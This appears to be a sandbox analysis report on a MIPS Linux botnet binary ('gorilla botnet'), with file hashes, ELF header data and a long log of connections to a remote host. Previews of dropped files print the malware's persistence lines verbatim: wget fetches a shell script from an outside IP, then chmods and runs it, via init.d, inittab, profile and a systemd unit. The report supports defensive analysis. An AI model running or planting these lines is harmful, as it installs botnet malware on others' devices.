SHA-256:	B761B6C61BC921302495AEFC4DBC5C2DD6FD87716B8464052A0E8925B2328364
SHA-512:	1485465561B40B68BFBF94ED1D8D258727492347A24F1F13866B7BF6C1C8EA93D4EFB4046DFFCC4D5B4C0BD2A31D3AAD88D02496ADD084DF301E44373CAAF223
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /tmp/mips.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/mips.nn.elf

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	406
Entropy (8bit):	4.51532074460258
Encrypted:	false
SSDEEP:	12:QRkiEXNxu6KUJgjvMbqFxzuKN+dRRucSOyd3:L1Ih4YOM3
MD5:	AFBA9EAF7F06CCF58F15B3D47D877F02
SHA1:	E9AB82BEDFCDC38122165340C4DCE0D19D1C366E
SHA-256:	A054AF0EC326F750753E8058EA0553D554483427E8D83264556F9DC6F747A0C1
SHA-512:	EE0559CA9A70B9430909F1224559C000EC5753C648EF5D59F469F49C81B66FA1B2E1B61ACC6436E4577986F787F720B1DC36992F8EE97438304347B3A5DB6B65
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/mips.nn.elf..case "" in. start). echo 'Starting mips.nn.elf'. /tmp/mips.nn.elf &. wget http://94.156.227.229/lol.sh -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping mips.nn.elf'. killall mips.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/mips.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	113
Entropy (8bit):	4.56688415543268
Encrypted:	false
SSDEEP:	3:TKH4vZKaLOFDvSDRFiLdjX43LpaKB0dFLoKE0:h8AqzSXoZX47zBeLXE0
MD5:	31AEF549BE996F464D002EC23450292D
SHA1:	57E7C130AD32003A32DAD835570B36CF14F5902B
SHA-256:	9BB73F8DEEB53A4898A7B6D8AABBE2020721C82E728057D0C54E410005392100
SHA-512:	4B9B552986E2347CEF9B6A669A512568F3A560FDAD5F87D913FBE3B675E4F7403557D9CA04853B7B7E5B4CD5C94C842150296610810DD9332802414FF3F51E4B
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh./tmp/mips.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/mips.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	118
Entropy (8bit):	4.546815676134211
Encrypted:	false
SSDEEP:	3:nAWu5ILOFDDoCvLdjX43LbaaFOdFXa5O:AYqfoYZX47baaeXCO
MD5:	2656A5394CFAD5F3940F5A67EFB8D2CB
SHA1:	FB31085E5CE9AF004A6B3A0B243BBD5CC58BEA38
SHA-256:	8558ABCB645B9494484BBCEB708C15C47C5DE2433C0DE78CDA3DFD997852E87A
SHA-512:	243470D4642DACB5060EDA458AD8CF30E528A54CF0D75B78DF3AF9B4EBC6EA18185334DDB1A2E61C43722D46325FA4BFE101021085D7B02B118C80D5E6175FC3
Malicious:	false
Reputation:	low
Preview:	::respawn:/tmp/mips.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/mips.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/mips.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	109
Entropy (8bit):	4.437211746276313
Encrypted:	false
SSDEEP:	3:TgaLOFDvSDRFiLdjX43LbaaFOdFXa50:TgAqzSXoZX47baaeXC0
MD5:	B4E5533094E8F135D190A367B14F814B
SHA1:	5EFBCD83AC885B80BCC49BB8882718313617535E
SHA-256:	0171AFC00DC793C31B0054D3CD9680BFD1D4E658365FAEC0FA1EBFA2330DB57B
SHA-512:	09F7EFA9BF43B03EADFF1F42D404BEC085B0F9CBBF7EA16EAB52A52ED2DA5160B4B435464F9E888531E43AF861DB270B367AFBDE07FA65554D71060306921396
Malicious:	true
Reputation:	low
Preview:	/tmp/mips.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/mips.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: sparc.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: m68k.nn.elf, Detection: malicious, Browse Filename: powerpc.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: powerpc.nn.elf, Detection: malicious, Browse Filename: sparc.nn.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/mips.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	307
Entropy (8bit):	5.04089949289434
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+kA02+GWRAZX47N2+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+9p+GWRkKY+GWRXY+GWRuL6
MD5:	F31A3146DAF0DDFC18CFDF5A80B7FF07
SHA1:	B2F9F4BD8ED78A7A5608B94C64725364E795D53B
SHA-256:	80A3D98250BBC3B09F0165D46340A7462B7B477CC061963E467B75041CBCB7E6
SHA-512:	130F9D921A91A71F86C8511694BE98C712A1018A66C9F4F49B3B2E8C3C02907DC583A3A5731F72D5BB4D6A1441C5ED26AD0BC99C6D7B079529C2CD8F739A5946
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/mips.nn.elf.ExecStartPost=/usr/bin/wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.EgVH5u (deleted)

Download File

Process:	/tmp/mips.nn.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.4992275471326932
Encrypted:	false
SSDEEP:	3:TgaLOln:TgAKn
MD5:	3B2A108EB9BDAC564681D1D50B5B8E8F
SHA1:	E744F918D99769B49D0C6E8CBEDD4A1590CBBD1E
SHA-256:	B89FE9B42F66509FF52B529092B42F8D759FB8E03059E8CC4039940A45287D87
SHA-512:	52A5D2AB05D38B4EEE703B8344837CA7B890D6C8CC32C7AAEE8F128EBBE5F45A92A72A54E8A14B4DB61E9E7E002CED615B52E7503F50FB46AD8738921B1C98A5
Malicious:	false
Preview:	/tmp/mips.nn.elf.

Static File Info

General

File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.6374917674803475
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	mips.nn.elf
File size:	114'688 bytes
MD5:	b43eadaccd79fac89cfb6756648c8385
SHA1:	5c91f020cac556540011e39d131faf1dc822ea0d
SHA256:	614ea3b191e68720cbc5bc854f8b0e0c5a7dd106230d56172201bb82d6ed4a80
SHA512:	fb655a5c15ff67fd39130bb54ba38226294192b0378bb61f7c2cbae8447c60e1bd69ea8b5b73932fc9f0c9dc71c3a35b8ac623d399a32e3760b76e786bc18b5c
SSDEEP:	1536:AzyjCAgnGyzoUgKLdT08RBcFCVn6MPss0IMepJ2lP8KTovQ:AWjluGVKJ1BcMVn6M/0In2d8KMY
TLSH:	A5B3E81E6E618FBDF659C23547B78E21A39C33D622E1D285E27DD1111E6038E241FFA8
File Content Preview:	.ELF.....................@.`...4.........4. ...(.............@...@...........................E...E......../X........dt.Q............................<...'.5L...!'.......................<...'.5(...!... ....'9... ......................<...'.4....!........'9.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	114128
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x18860	0x0	0x6	AX	16
.fini	PROGBITS	0x418980	0x18980	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x4189e0	0x189e0	0x26a0	0x0	0x2	A	16
.ctors	PROGBITS	0x45b084	0x1b084	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x45b08c	0x1b08c	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x45b098	0x1b098	0x54	0x0	0x3	WA	4
.data	PROGBITS	0x45b0f0	0x1b0f0	0x500	0x0	0x3	WA	16
.got	PROGBITS	0x45b5f0	0x1b5f0	0x77c	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x45bd6c	0x1bd6c	0x20	0x0	0x10000003	WAp	4
.bss	NOBITS	0x45bd90	0x1bd6c	0x224c	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0xe10	0x1bd6c	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x1bd6c	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x1b080	0x1b080	5.6592	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x1b084	0x45b084	0x45b084	0xce8	0x2f58	4.1918	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 09:19:00.357144117 CET	51358	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:00.476632118 CET	38242	51358	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:00.477035046 CET	51358	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:00.477406979 CET	51358	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:00.596888065 CET	38242	51358	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:01.003537893 CET	51358	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:01.163918018 CET	38242	51358	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:01.621786118 CET	38242	51358	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:01.621850014 CET	51358	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:02.006406069 CET	51360	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:02.126238108 CET	38242	51360	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:02.126648903 CET	51360	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:02.126688957 CET	51360	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:02.246241093 CET	38242	51360	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:02.632425070 CET	51360	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:02.795933962 CET	38242	51360	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:03.395562887 CET	38242	51360	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:03.395643950 CET	51360	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:03.738156080 CET	51362	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:03.857697010 CET	38242	51362	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:03.857837915 CET	51362	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:03.857837915 CET	51362	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:03.977365017 CET	38242	51362	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:04.366331100 CET	51362	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:04.531909943 CET	38242	51362	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:05.073457956 CET	38242	51362	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:05.073517084 CET	51362	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:05.369260073 CET	51364	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:05.488733053 CET	38242	51364	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:05.488827944 CET	51364	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:05.488827944 CET	51364	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:05.608362913 CET	38242	51364	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:06.087848902 CET	51364	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:06.247903109 CET	38242	51364	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:06.653412104 CET	38242	51364	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:06.653510094 CET	51364	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:07.089179039 CET	51366	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:07.208785057 CET	38242	51366	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:07.208846092 CET	51366	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:07.209053040 CET	51366	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:07.328458071 CET	38242	51366	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:07.716286898 CET	51366	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:07.971893072 CET	38242	51366	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:08.329778910 CET	38242	51366	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:08.329847097 CET	51366	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:08.718170881 CET	51368	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:08.837663889 CET	38242	51368	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:08.837722063 CET	51368	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:08.837744951 CET	51368	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:08.957149982 CET	38242	51368	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:09.342240095 CET	51368	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:09.508101940 CET	38242	51368	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:09.959239960 CET	38242	51368	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:09.959301949 CET	51368	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:10.343372107 CET	51370	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:10.462980032 CET	38242	51370	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:10.463049889 CET	51370	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:10.463094950 CET	51370	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:10.582648039 CET	38242	51370	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:10.967081070 CET	51370	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:11.128063917 CET	38242	51370	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:11.618623018 CET	38242	51370	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:11.618697882 CET	51370	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:11.968301058 CET	51372	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:12.087846994 CET	38242	51372	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:12.087903976 CET	51372	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:12.087938070 CET	51372	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:12.208111048 CET	38242	51372	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:12.597191095 CET	51372	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:12.759828091 CET	38242	51372	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:13.329511881 CET	38242	51372	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:13.329591036 CET	51372	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:13.598964930 CET	51374	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:13.718463898 CET	38242	51374	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:13.718585014 CET	51374	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:13.718631029 CET	51374	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:13.840075016 CET	38242	51374	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:14.222573996 CET	51374	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:14.384116888 CET	38242	51374	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:14.861391068 CET	38242	51374	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:14.861463070 CET	51374	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:15.223999977 CET	51376	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:15.343457937 CET	38242	51376	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:15.343626976 CET	51376	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:15.343626976 CET	51376	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:15.463131905 CET	38242	51376	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:15.849325895 CET	51376	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:16.015886068 CET	38242	51376	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:16.524246931 CET	38242	51376	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:16.524307966 CET	51376	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:16.850435019 CET	51378	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:16.969985008 CET	38242	51378	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:16.970087051 CET	51378	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:16.970128059 CET	51378	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:17.089721918 CET	38242	51378	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:17.474339962 CET	51378	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:17.639913082 CET	38242	51378	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:18.126410007 CET	38242	51378	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:18.126473904 CET	51378	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:18.475689888 CET	51380	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:18.595151901 CET	38242	51380	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:18.595210075 CET	51380	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:18.595241070 CET	51380	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:18.714709997 CET	38242	51380	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:19.098493099 CET	51380	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:19.259876966 CET	38242	51380	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:19.709312916 CET	38242	51380	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:19.709381104 CET	51380	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:20.099431038 CET	51382	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:20.219672918 CET	38242	51382	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:20.219750881 CET	51382	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:20.219832897 CET	51382	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:20.339327097 CET	38242	51382	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:20.723942995 CET	51382	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:20.883972883 CET	38242	51382	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:21.439135075 CET	38242	51382	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:21.439244032 CET	51382	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:21.725245953 CET	51384	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:21.844738960 CET	38242	51384	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:21.844834089 CET	51384	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:21.844834089 CET	51384	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:21.964394093 CET	38242	51384	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:22.349180937 CET	51384	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:22.511909008 CET	38242	51384	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:23.005498886 CET	38242	51384	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:23.005583048 CET	51384	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:23.350150108 CET	51386	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:23.469643116 CET	38242	51386	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:23.469695091 CET	51386	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:23.469724894 CET	51386	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:23.589154005 CET	38242	51386	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:23.973098040 CET	51386	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:24.135910988 CET	38242	51386	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:24.711956024 CET	38242	51386	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:24.712019920 CET	51386	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:24.974030972 CET	51388	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:25.093519926 CET	38242	51388	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:25.093591928 CET	51388	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:25.093620062 CET	51388	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:25.213123083 CET	38242	51388	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:25.597666025 CET	51388	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:25.759927034 CET	38242	51388	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:26.239721060 CET	38242	51388	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:26.239787102 CET	51388	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:26.598753929 CET	51390	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:26.718329906 CET	38242	51390	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:26.718389034 CET	51390	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:26.718420029 CET	51390	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:26.838505030 CET	38242	51390	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:27.221417904 CET	51390	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:27.387913942 CET	38242	51390	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:27.941140890 CET	38242	51390	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:27.941240072 CET	51390	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:28.222214937 CET	51392	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:28.341752052 CET	38242	51392	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:28.341975927 CET	51392	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:28.341999054 CET	51392	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:28.461517096 CET	38242	51392	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:28.845714092 CET	51392	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:29.008091927 CET	38242	51392	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:29.528568029 CET	38242	51392	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:29.528656006 CET	51392	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:29.847265005 CET	51394	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:29.967519045 CET	38242	51394	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:29.967801094 CET	51394	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:29.967801094 CET	51394	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:30.087326050 CET	38242	51394	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:30.471267939 CET	51394	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:30.631942034 CET	38242	51394	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:31.161160946 CET	38242	51394	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:31.161453009 CET	51394	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:31.473110914 CET	51396	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:31.592685938 CET	38242	51396	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:31.592747927 CET	51396	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:31.592775106 CET	51396	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:31.712567091 CET	38242	51396	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:32.096353054 CET	51396	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:32.255968094 CET	38242	51396	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:32.783155918 CET	38242	51396	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:32.783238888 CET	51396	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:33.097410917 CET	51398	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:33.217938900 CET	38242	51398	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:33.218009949 CET	51398	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:33.218028069 CET	51398	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:33.338800907 CET	38242	51398	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:33.721237898 CET	51398	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:33.883970022 CET	38242	51398	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:34.385385990 CET	38242	51398	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:34.385453939 CET	51398	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:34.722064018 CET	51400	38242	192.168.2.14	94.156.227.234
Dec 27, 2024 09:19:34.841666937 CET	38242	51400	94.156.227.234	192.168.2.14
Dec 27, 2024 09:19:34.841717958 CET	51400	38242	192.168.2.14	94.156.227.234
